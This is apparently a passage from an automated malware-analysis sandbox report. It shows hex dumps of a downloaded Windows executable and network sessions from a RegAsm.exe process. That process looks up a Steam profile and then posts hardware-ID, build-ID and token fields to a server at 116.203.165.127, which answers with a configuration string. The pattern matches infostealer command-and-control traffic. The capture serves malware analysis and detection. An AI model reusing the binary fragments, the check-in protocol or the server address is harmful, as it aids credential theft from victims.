                                                                                                                                                                                                                                2024-09-21 11:34:33 UTC7943INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 d2 e4 ed 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 9c 05 00 00 08 00 00 00 00 00 00 ee ba 05 00 00 20 00 00 00 c0 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 06 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELf @ `
                                                                                                                                                                                                                                2024-09-21 11:34:33 UTC8000INData Raw: 99 89 1a 7b 41 09 78 80 65 65 2e 2f 9a 44 d1 d3 98 5d 4c ea 04 51 72 87 2a cf d2 e6 86 29 49 b8 24 b8 25 05 c5 4c bf 6c ee 87 88 98 de 47 cf a6 7f 98 b1 db a7 f2 92 51 08 23 93 a0 c6 06 f4 2f d1 3b b9 a7 ab 1d 50 f2 22 e3 73 b2 5c 16 fd c5 5f 3c 3f 25 6c dd 54 30 1d 51 7c 09 06 ae a3 39 b1 18 4a aa d0 00 4c 06 1d 72 bf ea a5 47 ac bb a0 47 67 19 4f 26 fa 43 03 70 65 96 d6 a7 33 c7 c5 e2 fd a3 c5 cb 5e 95 41 ea 00 a5 b0 26 1f 7b 26 51 fa a8 82 ef 06 95 ab c8 e0 31 71 d7 b6 16 74 5f 9c 87 31 05 f5 60 60 41 ec 55 bb 23 31 eb 3e 3e 8a ec d8 36 95 57 4e 90 b3 52 e6 03 d7 e2 c4 67 4e f0 fa ed 0a 59 78 e1 91 34 30 02 5e fa 81 28 da 08 4b e4 6b f7 66 de c1 14 3a e8 8f 57 56 65 8d ee 87 94 76 90 50 1a e8 f9 8e 7f c9 dc ac a2 1e 22 de 9e c3 b4 75 cd b6 46 75 2a 9b
                                                                                                                                                                                                                                Data Ascii: {Axee./D]LQr*)I$%LlGQ#/;P"s\_<?%lT0Q|9JLrGGgO&Cpe3^A&{&Q1qt_1``AU#1>>6WNRgNYx40^(Kkf:WVevP"uFu*
                                                                                                                                                                                                                                2024-09-21 11:34:33 UTC8000INData Raw: b7 a9 9b c5 f6 61 2a aa 18 64 f6 dc cb 3a e3 9a c5 ab d6 6c 11 9f db 5e d8 28 6c 9c d9 ea 52 da fc 92 d5 ef 40 e4 6f 79 f0 53 c1 62 85 0d 8c b5 c6 b6 55 7d c5 05 19 46 39 50 74 a5 9e e3 d4 2b 9a 4a b2 07 a3 0d 9f 31 0a 53 69 a3 8c 40 83 88 75 cb 8f f5 02 6a cc 16 9e 4b 32 8b 2e f9 13 c7 b7 ae 63 fb 43 e6 49 10 c0 d9 b0 af 72 ee 26 eb b5 8f 9f 3c 04 80 71 eb 47 56 66 2a df 06 e6 c0 49 44 5b e9 c2 5c 17 91 24 65 87 ef 38 45 3e 24 59 d2 9f 53 35 6c 56 96 a3 7c 17 a2 c0 93 a2 1b b4 f7 ab 2d 91 6f b3 4d bd 88 ec 4b 30 56 89 a6 15 54 c2 d3 b5 11 74 13 2a f4 80 7d 5c 01 ff ee a6 b4 88 b1 45 b5 bd 95 db d2 67 2b af 68 1f c8 0b 80 2f ff 60 ff 1d d8 e4 22 0d 0c 51 f7 a1 de 60 2a 15 36 18 0c 82 b5 56 f1 3a 0e 12 c5 60 c0 b1 08 53 ef 7f be 89 b9 53 7d 47 84 0a a5 7c
                                                                                                                                                                                                                                Data Ascii: a*d:l^(lR@oySbU}F9Pt+J1Si@ujK2.cCIr&<qGVf*ID[\$e8E>$YS5lV|-oMK0VTt*}\Eg+h/`"Q`*6V:`SS}G|
                                                                                                                                                                                                                                2024-09-21 11:34:33 UTC8000INData Raw: 67 a7 4e ad a2 5d e0 f1 f8 94 1e aa 2f 8a b1 05 80 bf 51 2c 60 8f f8 a1 b4 de cc 29 04 cf 2a 7b 51 6d 66 08 1b d3 1e e2 1e fb a9 49 52 30 bb 7e cd 43 9f a5 bb 0b 64 43 7b 77 30 d9 5e cc ad 32 3a 17 3b 41 c8 93 b8 e8 da f8 85 29 f9 a8 29 2f b3 15 f1 e2 6a fd af 6d 60 6b 15 d7 75 fe 02 2a 0c 50 a0 3e 30 37 30 65 67 70 16 f4 0f a2 50 61 0d 25 1f 41 4c b4 a0 95 5d 9f 77 29 08 1f 0f 97 e5 95 9d 1c 87 01 de 66 fc ac 89 14 af 36 c1 63 70 2e 83 4c 68 92 95 00 8e f5 90 33 49 bb 75 da 66 7f 32 9f 5c ff c0 3e 79 7b fe 46 cf 9d 82 cf c0 c6 89 c9 a7 59 8d 42 06 e0 34 de 74 e1 58 8b e2 03 7e 63 82 c3 65 51 50 9d a9 e0 58 ee e3 8c c3 22 fb 38 b0 03 45 9c 1e e6 f4 2a cd 03 0a 32 16 c7 ba 0a 9f bd 69 b5 65 70 cd 33 46 ea 6e d2 90 79 80 ba c2 01 de ca 99 3d 6e d5 b7 98 ca
                                                                                                                                                                                                                                Data Ascii: gN]/Q,`)*{QmfIR0~CdC{w0^2:;A))/jm`ku*P>070egpPa%AL]w)f6cp.Lh3Iuf2\>y{FYB4tX~ceQPX"8E*2iep3Fny=n
                                                                                                                                                                                                                                2024-09-21 11:34:33 UTC8000INData Raw: 19 c4 06 07 cc 73 7e d9 d3 72 00 c8 0c f0 e7 91 6d 82 4f 4d 40 a3 55 19 a0 73 70 af 25 0f 0c 1a 9a ab f5 7b b0 8e 60 05 54 cf b8 40 ac d7 26 27 11 28 91 d6 c1 23 ea 45 ae 08 67 48 1c 36 f5 7f 26 b7 39 71 54 81 43 4a 5e b7 7a 91 20 9a 03 64 fd 0c d2 f5 a9 0c 16 f6 a9 54 40 35 54 4a 7a 4a 56 f1 39 f0 8d 26 1f bd 33 80 3d 73 d3 12 25 64 c7 04 e0 bd f4 74 79 1c 98 e6 b5 82 92 c1 c9 ef 86 e9 6b 01 92 75 2d ed c8 96 13 87 ff a5 4a fb da 69 ea 42 fe ac 2b f6 ae c0 47 90 a2 f4 aa 0f 51 d9 c0 3a 04 4d b4 43 a3 5a 31 ce d1 30 2b bf 28 4a 4e 4b a1 c5 18 37 0e ba c4 07 20 af d7 e4 b3 c9 70 ae be c4 cc c5 b3 cd 00 da a4 66 2b 41 83 f7 67 60 45 38 e3 a8 c5 15 cc ce 33 e5 14 46 1a ac ec 06 94 45 5d 5d 7b 0d 1f e5 cb ba 27 c6 be c9 e7 b2 81 ee a2 4b bd 98 29 d2 b3 9e 17
                                                                                                                                                                                                                                Data Ascii: s~rmOM@Usp%{`T@&'(#EgH6&9qTCJ^z dT@5TJzJV9&3=s%dtyku-JiB+GQ:MCZ10+(JNK7 pf+Ag`E83FE]]{'K)
                                                                                                                                                                                                                                2024-09-21 11:34:33 UTC8000INData Raw: 99 b4 98 71 08 aa 1b dd c4 91 31 53 67 95 1c b8 33 f4 ea 0c 3e 4f 8b 86 e4 9e 31 5a 26 db 1f f0 b3 00 90 83 76 3a 14 98 c2 5d 16 05 6a 86 3d e2 aa f1 16 10 90 f7 2a c2 70 10 ae 40 30 a0 27 a8 bc b0 58 83 66 af 22 b0 7c 2d 80 f8 61 33 48 fc 37 c4 ae 7f 35 61 86 4c 15 fd 88 94 d7 e2 bd 93 25 5d c6 a4 13 c0 07 84 8a 71 14 70 39 c0 10 3c 72 7c fa c8 ce 7c 2e de b2 4a 2a 7f b6 ad 0f 61 36 a7 0e d5 4a f8 ab 8a a6 a9 4b ae 1d 3c c6 86 73 09 99 fd c0 c4 5a 02 ef 9a e8 7b 76 0a 20 26 60 f9 26 41 83 b7 df 0b 07 ef e7 95 eb a9 80 ff ba c8 fd ac ff 29 b9 54 23 0a e9 0a 62 bf 35 91 bb d4 0f 7d b0 13 f7 7d b6 5c 2c ea 59 c6 18 b4 70 c0 ea e7 cb 50 a6 14 bd 84 07 e2 67 0d d5 fc e8 01 f2 f4 97 fc 3f ff 39 a8 22 c5 e5 ed 6f 65 2c fd fc a0 7d 8a 7e e7 83 d3 01 d5 c8 2c fc
                                                                                                                                                                                                                                Data Ascii: q1Sg3>O1Z&v:]j=*p@0'Xf"|-a3H75aL%]qp9<r||.J*a6JK<sZ{v &`&A)T#b5}}\,YpPg?9"oe,}~,
                                                                                                                                                                                                                                2024-09-21 11:34:33 UTC8000INData Raw: 0b ce bb 16 4c 8c 8d a3 a5 c5 e6 a0 cd c9 1a d3 3d 3b 64 50 16 14 05 1c 2d 73 5a 3a 1a 68 cd ba 57 b1 05 d9 f1 b4 e6 48 62 41 4b fc b8 b5 17 b9 ba 7a 2b 9e dc 07 a3 e4 8b 37 c9 a2 87 a8 a2 8f 1b 27 bd d4 6b 0b 20 c1 67 f9 55 5e 9d 55 f1 ce 62 6a 01 ac ec c5 86 01 c8 74 51 d0 62 e0 12 94 b4 61 29 ef d1 46 2d 39 b8 c5 84 20 75 26 73 8d 6b d9 41 7f f2 2f d9 22 71 80 71 33 7b 3a df 18 fc 99 81 d5 f2 16 16 dc 1d ce 16 a3 98 a7 bf 28 0a 22 64 32 7e ad f7 26 33 8f a4 3d df 47 71 fa 92 66 36 0c 5c 01 60 2a 9e 52 c4 aa 8d c7 c2 b4 de 45 85 27 e4 ac ab cc 86 a9 43 a2 0a 8c 70 03 13 6d 75 af a4 98 5f 5c fe 98 ef a6 aa fc 29 59 98 30 74 6a 05 65 14 29 19 54 56 4f 3f 13 13 f2 b5 85 1b 0c fc 32 a8 38 fc f4 9e 8b c1 88 c6 40 03 7e 77 19 09 7b 84 e6 f8 68 0d ca 57 e6 09
                                                                                                                                                                                                                                Data Ascii: L=;dP-sZ:hWHbAKz+7'k gU^UbjtQba)F-9 u&skA/"qq3{:("d2~&3=Gqf6\`*RE'Cpmu_\)Y0tje)TVO?28@~w{hW
                                                                                                                                                                                                                                2024-09-21 11:34:33 UTC8000INData Raw: d5 09 e8 1e aa 48 16 68 c0 c9 5c c2 9e 9a ac 7b 4c 35 66 21 a7 46 7c a1 c2 70 25 e1 5a 10 4a 53 3a 9b 91 82 21 cf 31 99 b6 b2 a3 62 18 ca 07 90 72 18 a2 51 6a 9d 5f 1c 63 85 6b e1 f5 c5 96 c6 cd 5d 1c 97 d5 ea 1c 3a 98 cd 1f d3 ba 4f 6b 9f 99 db e8 62 ba 51 d1 f3 05 be 85 ad 4f f6 b1 21 44 59 84 fe 03 38 23 9b 11 42 12 54 6b 02 28 70 bd 41 4e 4f e3 99 7e b7 be df 29 8f 77 c3 4c 1a d6 0a dc b4 8c 5e 47 1b cd 67 b1 7e 93 60 bb 29 c8 08 5c ca 69 36 08 8e 25 90 95 07 f8 e3 36 b8 97 9b 18 4d d3 69 b6 ef c9 7c 0e 84 0d 1e 60 16 fe 0a 97 bd 62 46 83 9c 18 e3 58 41 2d 0e c4 0b a7 af 40 9c a1 2c 77 f4 f2 48 2b f8 b7 b7 3b 2d 41 92 93 57 72 52 00 04 8f 00 59 78 27 cf 46 7d e5 eb 26 a9 12 a0 b5 64 88 4f 7a dd 9a f6 08 12 e8 4f 7f 97 de 80 72 33 36 f3 d4 e1 99 ac bc
                                                                                                                                                                                                                                Data Ascii: Hh\{L5f!F|p%ZJS:!1brQj_ck]:OkbQO!DY8#BTk(pANO~)wL^Gg~`)\i6%6Mi|`bFXA-@,wH+;-AWrRYx'F}&dOzOr36
                                                                                                                                                                                                                                2024-09-21 11:34:33 UTC8000INData Raw: 01 39 22 b0 97 73 13 02 34 14 92 35 26 e5 0a 14 81 d1 c5 97 dd 72 d9 8e 1d f5 6c 18 1b 5c c4 ec 43 35 5e 80 77 8f cd ca 5a 09 42 0e 4b e0 50 72 4b c0 6b 09 e1 94 35 7f 8f 2c 48 ba 0c 40 6c 52 88 31 0d 20 93 6c b9 6d 77 38 a8 ff de 7e 11 95 d5 e8 fd e9 5c 07 6a 03 8a a5 54 9f 18 99 43 cf 95 7d 10 18 45 34 70 5b e5 2e 07 28 ef e9 fe fd 35 d6 62 96 ee ae 92 7f 20 68 b0 f1 8d f4 bb 35 27 1c c9 04 be 8d 94 e4 47 37 f6 ad c8 69 c0 ed d8 d6 da 34 8f d0 35 21 d0 74 6d 1f b0 27 f3 b9 c4 55 42 fd 8b 4b bb a4 82 db 9a a9 b7 0e a1 dc c9 17 18 07 90 ab 45 42 f0 dc ec 1f a8 c2 2f a1 ce 49 40 1a 53 ca 2a eb 04 3c 92 95 6c 42 b7 b8 2f dc 16 39 d4 e0 00 25 df 8e 90 69 e8 fc 79 11 37 97 82 4f 55 ed 0f 0c 02 a8 e3 2d 67 1c 4b c4 a6 13 7e 0e 96 c3 99 00 b4 49 37 ee d4 c8 3a
                                                                                                                                                                                                                                Data Ascii: 9"s45&rl\C5^wZBKPrKk5,H@lR1 lmw8~\jTC}E4p[.(5b h5'G7i45!tm'UBKEB/I@S*<lB/9%iy7OU-gK~I7:
                                                                                                                                                                                                                                2024-09-21 11:34:33 UTC8000INData Raw: 80 65 74 49 d0 02 36 55 23 3d 5c 72 b1 3a b7 c4 bf 24 76 85 ad c8 0b 2c 4f 61 60 80 c1 f4 83 21 90 5b 54 78 99 16 c5 d1 a8 5e 42 c5 52 a3 71 55 b1 c4 5e 3e ef 18 68 ed 68 f7 fa e9 48 e8 d5 0d 00 90 4a c4 7d 9d 94 55 da d4 7c 46 50 b1 0f 86 ca 41 b0 d9 e0 49 f3 d2 4c 74 89 c4 2b 85 0e 07 fe 92 af 02 f4 da dd 07 36 8a cc db 8f 58 64 13 21 59 fe 19 67 d2 ff 04 1d 8d 59 dc d9 47 73 0b 4c 21 7c f9 03 35 55 7c 92 d9 4e 76 63 a4 15 36 9b ce 73 7d f0 fa e6 27 f7 74 80 d7 79 75 85 38 4d 0c b2 f8 49 45 b6 cd 56 85 77 d1 15 39 df 0a 3d 73 12 49 98 74 38 68 41 93 6d a9 ca aa f8 bc 94 67 8e e7 24 ed ca e5 c4 b6 ed 99 de 13 7e c6 d0 b9 5f a9 f8 9a ce ab c5 35 74 15 e1 60 f1 03 8f ab 36 15 31 ee e6 f9 a2 bb c1 5c aa a0 9e 55 b7 35 fc 35 84 e4 bc 82 94 38 77 e8 9f 6d 1b
                                                                                                                                                                                                                                Data Ascii: etI6U#=\r:$v,Oa`![Tx^BRqU^>hhHJ}U|FPAILt+6Xd!YgYGsL!|5U|Nvc6s}'tyu8MIEVw9=sIt8hAmg$~_5t`61\U558wm


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                9192.168.2.94975823.197.127.214435752C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-21 11:34:41 UTC119OUTGET /profiles/76561199780418869 HTTP/1.1
                                                                                                                                                                                                                                Host: steamcommunity.com
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                2024-09-21 11:34:42 UTC1870INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                                Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:34:42 GMT
                                                                                                                                                                                                                                Content-Length: 34740
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Set-Cookie: sessionid=0563688e7661a57a860c53f1; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                2024-09-21 11:34:42 UTC14514INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                                                                                                                                                                                2024-09-21 11:34:42 UTC10062INData Raw: 64 65 73 74 72 6f 79 57 68 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 61 69 6e 65 72 27 2c 20 27 63 6f 72 72 65 63 74 46 6f 72 53 63 72 65 65 6e 53 69 7a 65 27 3a 20 66 61 6c 73 65 7d 29 3b 0d 0a 09 09 7d 29 3b 0d 0a 09 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 73 22 3e 0d 0a 09 09 09 3c 64 69
                                                                                                                                                                                                                                Data Ascii: destroyWhenDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><di
                                                                                                                                                                                                                                2024-09-21 11:34:42 UTC10164INData Raw: 6d 6d 75 6e 69 74 79 2e 61 6b 61 6d 61 69 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 4d 4d 55 4e 49 54 59 5f 43 44 4e 5f 41 53 53 45 54 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 64 6e 2e 61 6b 61 6d 61 69 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 5c 2f 70 75 62 6c 69 63 5c 2f 61 73 73 65 74 73 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 53 54 4f 52 45 5f 43 44 4e 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 6f 72 65 2e 61 6b 61 6d 61 69 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 50 55 42 4c 49 43 5f 53 48 41 52 45
                                                                                                                                                                                                                                Data Ascii: mmunity.akamai.steamstatic.com\/&quot;,&quot;COMMUNITY_CDN_ASSET_URL&quot;:&quot;https:\/\/cdn.akamai.steamstatic.com\/steamcommunity\/public\/assets\/&quot;,&quot;STORE_CDN_URL&quot;:&quot;https:\/\/store.akamai.steamstatic.com\/&quot;,&quot;PUBLIC_SHARE


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                10192.168.2.949761116.203.165.1274435752C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-21 11:34:43 UTC188OUTGET / HTTP/1.1
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                Host: 116.203.165.127
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                2024-09-21 11:34:44 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:34:44 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                2024-09-21 11:34:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                11192.168.2.949762116.203.165.1274435752C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-21 11:34:45 UTC280OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----FCGIJDBAFCBAAKECGDGC
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                Host: 116.203.165.127
                                                                                                                                                                                                                                Content-Length: 256
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                2024-09-21 11:34:45 UTC256OUTData Raw: 2d 2d 2d 2d 2d 2d 46 43 47 49 4a 44 42 41 46 43 42 41 41 4b 45 43 47 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 37 31 43 45 31 36 43 46 45 35 33 34 32 32 38 33 31 39 34 30 33 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 46 43 47 49 4a 44 42 41 46 43 42 41 41 4b 45 43 47 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 38 30 62 65 34 35 61 31 65 62 36 34 35 34 63 61 39 31 36 66 39 32 63 33 36 65 62 66 36 37 64 0d 0a 2d 2d 2d 2d 2d 2d 46 43 47 49 4a 44 42 41 46 43 42 41 41 4b 45 43 47 44 47 43 2d 2d 0d
                                                                                                                                                                                                                                Data Ascii: ------FCGIJDBAFCBAAKECGDGCContent-Disposition: form-data; name="hwid"C71CE16CFE534228319403-a33c7340-61ca------FCGIJDBAFCBAAKECGDGCContent-Disposition: form-data; name="build_id"d80be45a1eb6454ca916f92c36ebf67d------FCGIJDBAFCBAAKECGDGC--
                                                                                                                                                                                                                                2024-09-21 11:34:46 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:34:45 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                2024-09-21 11:34:46 UTC69INData Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 39 39 31 65 34 66 32 38 61 30 64 66 38 35 38 37 32 30 63 32 65 64 34 30 38 39 35 35 34 38 63 37 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 3a1|1|1|1|991e4f28a0df858720c2ed40895548c7|1|1|1|0|0|50000|10


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                12192.168.2.949763116.203.165.1274435752C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-21 11:34:47 UTC280OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----CFCGIIEHIEGDGDGCAEBG
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                Host: 116.203.165.127
                                                                                                                                                                                                                                Content-Length: 331
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                2024-09-21 11:34:47 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 43 46 43 47 49 49 45 48 49 45 47 44 47 44 47 43 41 45 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 39 31 65 34 66 32 38 61 30 64 66 38 35 38 37 32 30 63 32 65 64 34 30 38 39 35 35 34 38 63 37 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 47 49 49 45 48 49 45 47 44 47 44 47 43 41 45 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 38 30 62 65 34 35 61 31 65 62 36 34 35 34 63 61 39 31 36 66 39 32 63 33 36 65 62 66 36 37 64 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 47 49 49 45 48 49 45 47 44 47 44 47 43 41 45 42 47 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                Data Ascii: ------CFCGIIEHIEGDGDGCAEBGContent-Disposition: form-data; name="token"991e4f28a0df858720c2ed40895548c7------CFCGIIEHIEGDGDGCAEBGContent-Disposition: form-data; name="build_id"d80be45a1eb6454ca916f92c36ebf67d------CFCGIIEHIEGDGDGCAEBGCont
                                                                                                                                                                                                                                2024-09-21 11:34:47 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:34:47 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
